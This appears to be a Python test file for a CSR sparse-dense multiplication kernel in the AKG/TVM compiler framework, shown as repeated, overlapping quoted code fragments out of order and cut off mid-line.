attrs=attrs, kernel_name=\"csr_mul\")", "attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\": mod_source =", "if not res: mod_source = mod if target_name != \"llvm\": mod_source = mod.imported_modules[0]", "ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" +", "= compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name =", "utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res", "[shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if", 
"ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col]))", "dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if", "== len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib", "= tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] <", "from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from", "dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, )", "return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None):", "ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" +", "+ j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx,", "if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0))", "sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs", "ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val", "* ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0,", "tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], 
outs[0]),", "data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1,", "op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2)", "and weight must have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape", "dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape =", "sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"]", "= tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape)", "+ dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape],", "return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3],", "sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2,", "assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2", "need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data,", "output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect)", "import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from", "def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2,", "gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2,", "= [shape2] dense, 
sparse_data, col_idx, row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape", "kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from", "get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec", "= tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end", "dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1])", "sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not", "get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const(", "len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output):", "i: start = ib.load(row_idx, i) end = ib.load(row_idx, i + 1) with ib.for_range(0,", "sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2,", "akg.utils import kernel_exec as utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array,", "output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\",", "res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if", "* ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val 
* ib.load(dense,", "= start + j with ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col", "= scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data,", "0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense,", "ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense =", "from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) ==", "need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0]", "mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense,", "tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx,", "return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf =", "1) with ib.for_range(0, end - start, name='j') as j: pos = start +", "sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf],", "col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with", "tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0],", "expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, 
row_idx.shape],", "scipy.sparse import akg from akg import tvm from akg import topi from tests.common.base", "not attrs: attrs = {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense,", "ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return", "<= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the same", "val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense,", "\"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx,", "expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs =", "atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\"", "{\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect", "val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name +", "akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx,", "dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data =", "dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen data", "tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) ==", "outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data", "from akg.utils.result_analysis import target_profiling from 
akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape", "output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data,", "import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from", "= row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape,", "shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs,", "end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos,", "import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import", "to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod, *args_list, target=target_name, repeat_time=attrs[\"repeat_time\"])", "akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio", "with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name =", "expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2,", "col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) ==", "sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim", "= \"T_csr_mul_\" + dense.op.name + 
\"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name)", "\"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list", "= attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\": mod_source", "shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2),", "dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense,", "== 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype", "mod if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test", "if len(expect.shape) == 0: output_shape = (1, ) output = np.zeros(output_shape, expect.dtype) output", "row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0:", "import tvm from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import", "shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1)", "sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\"", "import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2, \"only", "supports 2-dim sparse tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data", "sparse_data, col_idx, 
row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i:", "row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol,", "pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim):", "[i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name", "row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape)", "dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense,", "= sparse_data.shape[0] // shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1,", "= ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val *", "sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False, attrs=None): if not attrs:", "import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape):", "ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output,", "col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf", "= gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0]", "= sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), 
expect.data def test_csr_mul(shape1, shape2, dtype1,", "gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2):", "have the same dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape", "rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not", "val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val *", "get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape)", "tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end =", "ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1)", "== sparse_data.dtype, \"data and weight must have the same dtype\" num_rows = row_idx.shape[0]", "sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda", "ib.if_scope(pos < end): val = ib.load(sparse_data, pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand):", "compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name = attrs[\"target\"].split()[0]", "if target_name != \"llvm\": mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\")", "import scipy.sparse import akg from akg import tvm from akg import topi from", "fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, 
output, expect], akg.tvm.context(target_name,", "- start, name='j') as j: pos = start + j with ib.if_scope(pos <", "sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output,", "ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2,", "row_idx, expect = gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0]", "* ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\"", "density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data", "target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod if target_name != \"llvm\":", "num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape =", "\"data and weight must have the same dtype\" num_rows = row_idx.shape[0] - 1", "ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val *", "name='j') as j: pos = start + j with ib.if_scope(pos < end): val", "import numpy as np import scipy.sparse import akg from akg import tvm from", "np import scipy.sparse import akg from akg import tvm from akg import topi", "from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx,", "[col])) with ib.else_scope(): with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with", "end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as", "dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2)) return dense, sparse_data.data, 
sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1,", "from tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as", "with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx,", "= (1, ) output = np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx,", "= ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j') as j:", "broadcast_shape = get_broadcast_shape(dense_shape, sparse_shape) need_expand = tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape)", "utils from akg.utils.result_analysis import target_profiling from akg.utils.format_transform import to_tvm_nd_array, get_shape from akg.utils.dsl_create import", "out_buffers=[out_buf], name=output_name) def gen_data(shape1, shape2, dtype1, dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0],", "with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos,", "col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with", "col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start", "dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1,", "np.zeros(output_shape, expect.dtype) output = utils.mod_launch(mod, (dense, sparse_data, col_idx, row_idx, output), expect=expect) atol, rtol", "gen_data(shape1, shape2, dtype1, dtype2) output_shape = expect.shape attrs[\"csr_avg_row\"] = sparse_data.shape[0] // shape1[0] mod", "mod_source = mod.imported_modules[0] print(\"Error {}:========================\".format(target_name)) 
print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list =", "ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name = \"T_csr_mul_\"", "\"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return", "broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense,", "= {\"target\": \"cuda\"} # gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx,", "len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1]", "i) end = ib.load(row_idx, i + 1) with ib.for_range(0, end - start, name='j')", "as np import scipy.sparse import akg from akg import tvm from akg import", "dtype2): dense = random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect =", "= tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx,", "def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i')", "random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils from akg.utils.result_analysis", "import topi from tests.common.base import get_rtol_atol from tests.common.gen_random import random_gaussian from tests.common.tensorio import", "dtype1, dtype2, poly_sch=False, attrs=None): if not attrs: attrs = {\"target\": \"cuda\"} # gen", "to_tvm_nd_array, get_shape from akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert", "= tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return 
tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs:", "{}:========================\".format(target_name)) print(mod_source.get_source()) raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx,", "len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0]) need_broadcast_last_dim = tvm.const( len(dense_shape) == len(broadcast_shape)", "expect=expect) atol, rtol = get_rtol_atol(\"csr_mul\", dtype1) res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test", "[dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape", "pos) col = ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col]))", "dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\" num_rows =", "ib.load(col_idx, pos) with ib.if_scope(need_expand): ib.store(output, pos, val * ib.load(dense, [col])) with ib.else_scope(): with", "[0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim): ib.store(output, pos, val * ib.load(dense, [i, 0]))", "res = compare_tensor(output, expect, rtol=rtol, atol=atol) print(\"Test {}\".format(\"Pass\" if res else \"Failed\")) target_name", "if res else \"Failed\")) target_name = attrs[\"target\"].split()[0] if not res: mod_source = mod", "len(broadcast_shape) and dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib =", "2 assert dense.dtype == sparse_data.dtype, \"data and weight must have the same dtype\"", "tvm.const(len(dense_shape) < len(broadcast_shape)) need_broadcast_first_dim = tvm.const( len(dense_shape) == len(broadcast_shape) and dense_shape[0] < broadcast_shape[0])", "0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i, col])) return ib.get() output_name", "\"cuda\"} # gen data op_attrs = [shape2] 
dense, sparse_data, col_idx, row_idx, expect =", "sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1],", "attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output, expect], akg.tvm.context(target_name, 0)) target_profiling(mod,", "// shape1[0] mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2],", "out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data, col_idx, row_idx], lambda ins,", "mod = utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch,", "ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i) end = ib.load(row_idx, i", "polyhedral=poly_sch, attrs=attrs, kernel_name=\"csr_mul\") if len(expect.shape) == 0: output_shape = (1, ) output =", "+ \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape, sparse_data.dtype, output_name) return tvm.extern([shape], [dense, sparse_data,", "dtype\" num_rows = row_idx.shape[0] - 1 dense_shape = get_shape(dense.shape) sparse_shape = get_shape(shape) broadcast_shape", "tensor\" assert len(dense.shape) <= 2 assert dense.dtype == sparse_data.dtype, \"data and weight must", "akg.utils.dsl_create import get_broadcast_shape def csr_mul(dense, sparse_data, col_idx, row_idx, shape): assert len(shape) == 2,", "with ib.if_scope(need_broadcast_first_dim): ib.store(output, pos, val * ib.load(dense, [0, col])) with ib.else_scope(): with ib.if_scope(need_broadcast_last_dim):", "col_idx, row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert", "# gen data op_attrs = [shape2] dense, sparse_data, col_idx, row_idx, expect = gen_data(shape1,", "res: mod_source = mod if target_name != \"llvm\": mod_source = 
mod.imported_modules[0] print(\"Error {}:========================\".format(target_name))", "as j: pos = start + j with ib.if_scope(pos < end): val =", "tests.common.gen_random import random_gaussian from tests.common.tensorio import compare_tensor from akg.utils import kernel_exec as utils", "row_idx, shape): assert len(shape) == 2, \"only supports 2-dim sparse tensor\" assert len(dense.shape)", "val * ib.load(dense, [i, 0])) with ib.else_scope(): ib.store(output, pos, val * ib.load(dense, [i,", "= utils.op_build_test(csr_mul, [shape1, sparse_data.shape, col_idx.shape, row_idx.shape], [dtype1, dtype1, dtype2, dtype2], op_attrs=op_attrs, polyhedral=poly_sch, attrs=attrs,", "col_idx, row_idx], lambda ins, outs: gen_ir(ins[0], ins[1], ins[2], ins[3], outs[0]), dtype=sparse_data.dtype, out_buffers=[out_buf], name=output_name)", "shape2)) return dense, sparse_data.data, sparse_data.indices.astype(dtype2), sparse_data.indptr.astype(dtype2), expect.data def test_csr_mul(shape1, shape2, dtype1, dtype2, poly_sch=False,", "ib = tvm.ir_builder.create() with ib.for_range(0, num_rows, name='i') as i: start = ib.load(row_idx, i)", "dense_shape[1] < broadcast_shape[1]) def gen_ir(dense, sparse_data, col_idx, row_idx, output): ib = tvm.ir_builder.create() with", "ib.get() output_name = \"T_csr_mul_\" + dense.op.name + \"_\" + sparse_data.op.name out_buf = tvm.decl_buffer(sparse_data.shape,", "= random_gaussian(shape1).astype(dtype1) sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = sparse_data.multiply(np.broadcast_to(dense, shape2))", "akg import tvm from akg import topi from tests.common.base import get_rtol_atol from tests.common.gen_random", "raise AssertionError(\"Test fail\") if attrs[\"profiling\"]: args_list = to_tvm_nd_array( [dense, sparse_data, col_idx, row_idx, output,", "sparse_data = scipy.sparse.rand(shape2[0], shape2[1], density=0.2, format='csr', dtype=dtype1) expect = 
